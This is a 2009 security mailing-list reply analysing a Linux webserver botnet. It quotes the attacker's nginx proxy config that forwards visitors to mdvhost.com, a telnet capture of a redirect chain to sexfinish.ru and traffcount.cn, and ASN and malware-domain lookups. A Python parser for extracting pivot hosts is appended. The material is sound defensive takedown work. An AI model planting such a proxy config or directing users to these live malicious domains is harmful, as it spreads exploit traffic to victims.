[nsp-sec] Linux webserver botnet

Stephen Gill gillsr at cymru.com
Tue Sep 15 18:09:14 EDT 2009


>   server {
>     listen 8080;
>     location / {
>       proxy_pass        http://mdvhost.com:4480;
>       proxy_redirect    off;
>       proxy_ignore_client_abort on;
>       proxy_set_header  X-Real-IP  $remote_addr;
>       proxy_set_header  Host        $host;
>       proxy_buffers     100 50k;
>       proxy_read_timeout 300;
>       proxy_send_timeout 300;
>     }
> location = /info { stub_status on; }
>   }
> 
> }
> 
> tom at dhcp-241:~$ telnet mdvhost.com 4480
> Trying 95.211.98.139...
> Connected to mdvhost.com.
> Escape character is '^]'.
> GET /ts/in.cgi?reopen HTTP/1.0
> Host:mdvhost.com
> 
> HTTP/1.1 302 Found
> Server: nginx
> Date: Tue, 15 Sep 2009 17:33:56 GMT
> Content-Type: text/html
> Connection: close
> Set-Cookie: SL_reopen_0000=_1_; domain=traffcount.cn; path=/; expires=Wed,
> 16-Sep-2009 19:43:36 GMT
> Set-Cookie: TSUSER=reopen; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/;
> domain=traffcount.cn
> Set-Cookie: SL_default_0000=_1_; domain=traffcount.cn; path=/; expires=Wed,
> 16-Sep-2009 19:43:36 GMT
> Location: http://sexfinish.ru:8080/index.php
> 
> <html>
> <head>
> <meta http-equiv="REFRESH" content="1;
> URL='http://sexfinish.ru:8080/index.php'">
> </head>
> <body>
> document moved <a href="http://sexfinish.ru:8080/index.php">here</a>
> </body>
> </html>
> Connection closed by foreign host.
> 
> Should we consider trying to get mdvhost.com and sexfinish.ru pulled from
> their TLDs or get DNS hosting shut down?

Probably, yes.

mdvhost.com

AS      | IP               | AS Name
16265   | 95.211.98.139    | LEASEWEB LEASEWEB AS
16265   | 95.211.98.142    | LEASEWEB LEASEWEB AS

sexfinish.ru

Bulk mode; whois.cymru.com [2009-09-15 21:20:40 +0000]
AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
16265   | 85.17.237.5      | 85.17.0.0/16        | NL | ripencc  | 2005-03-11 | LEASEWEB LEASEWEB AS
16276   | 91.121.24.139    | 91.121.0.0/17       | FR | ripencc  | 2006-09-20 | OVH OVH
16276   | 91.121.4.192     | 91.121.0.0/17       | FR | ripencc  | 2006-09-20 | OVH OVH
16276   | 91.121.97.186    | 91.121.0.0/17       | FR | ripencc  | 2006-09-20 | OVH OVH
20857   | 80.69.74.73      | 80.69.64.0/19       | NL | ripencc  | 2001-05-29 | TRANSIP-AS TransIP BV


Looks like there is also traffcount.cn in your info above which appears
related:

traffcount.cn

4812    | 222.73.37.203    | CHINANET-SH-AP China Telecom (Group)

Even more related domains:

http://www.malwareurl.com/listing.php?domain=traffcount.cn

Domain             | IP            | Description                     | Contact                                       | Date
javastat.cn        | 222.73.37.203 | Trojan                          | Kovalev Sergey / ea-starr at ya.ru            | 2009-08-14
tech2tech.cn       | 222.73.37.203 | Exploits / Trojan FraudPack     | Dzhoni Depp / sekes2 at gmail.com             | 2009-08-15
ns1.dns-lv9720.com | 222.73.37.203 | Name server for malware domains | Michell / Michell.Gregory2009 at yahoo.com    | 2009-08-22
css-csript.cn      | 222.73.37.203 | Malware URLs                    | IveevPlansky / ru at rupoisk.in               | 2009-08-22
marcusmed.com      | 222.73.37.203 | Fraud - Scam                    | Steven Lucas / steven_lucas_2000 at yahoo.com | 2009-08-22
l2stat.cn          | 222.73.37.203 | Directs to Exploits             | Dyivadov Aleksandr / ea-starr at ya.ru        | 2009-09-03
traffcount.cn      | 222.73.37.203 | Directs to Exploits             | LucasSteven / steven_lucas_2000 at yahoo.com  | 2009-09-14
ygw4gwe.cn         |               |                                 |                                               |


-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
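The redirect captured in the quoted session names hosts in three places (the Location header, the Set-Cookie domain attribute and the meta refresh in the body), and the reply pivots on the cookie domain traffcount.cn. As an added example that is not part of this thread, the Python below parses that captured response and lists every host it names together with where it appeared; the response text is reconstructed from the quoted session with the wrapped header lines re-joined, and the function name is my own.

```python
import re
from email.parser import Parser
from urllib.parse import urlsplit

# Constructed sample: the 302 response quoted in the thread, with the Set-Cookie
# and meta-refresh lines re-joined where the list archive wrapped them.
SAMPLE_RESPONSE = """HTTP/1.1 302 Found
Server: nginx
Date: Tue, 15 Sep 2009 17:33:56 GMT
Set-Cookie: SL_reopen_0000=_1_; domain=traffcount.cn; path=/; expires=Wed, 16-Sep-2009 19:43:36 GMT
Set-Cookie: TSUSER=reopen; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=traffcount.cn
Set-Cookie: SL_default_0000=_1_; domain=traffcount.cn; path=/; expires=Wed, 16-Sep-2009 19:43:36 GMT
Location: http://sexfinish.ru:8080/index.php

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://sexfinish.ru:8080/index.php'">
</head>
<body>
document moved <a href="http://sexfinish.ru:8080/index.php">here</a>
</body>
</html>
"""

META_REFRESH = re.compile(r'content="\s*\d+\s*;\s*URL=[\'"]?([^\'">]+)', re.I)
HREF = re.compile(r'href=[\'"]([^\'"]+)', re.I)

def extract_pivots(raw):
    """Return (status line, {host: set of places in the response naming it})."""
    head, _, body = raw.partition("\n\n")
    status, _, header_text = head.partition("\n")
    headers = Parser().parsestr(header_text)  # HTTP/1.x headers are RFC 822 style
    found = {}

    def note(host, where):
        if host:
            found.setdefault(host, set()).add(where)

    note(urlsplit(headers.get("Location", "")).hostname, "Location")
    for cookie in headers.get_all("Set-Cookie", []):
        # Attributes are ';'-separated; the domain attribute scopes the cookie.
        for attr in cookie.split(";"):
            name, _, value = attr.strip().partition("=")
            if name.lower() == "domain":
                note(value.strip().lstrip("."), "Set-Cookie domain")
    for url in META_REFRESH.findall(body):
        note(urlsplit(url).hostname, "meta refresh")
    for url in HREF.findall(body):
        note(urlsplit(url).hostname, "href")
    return status.strip(), found
```

Each host in the result is a candidate for the IP-to-ASN and listing lookups shown in the reply.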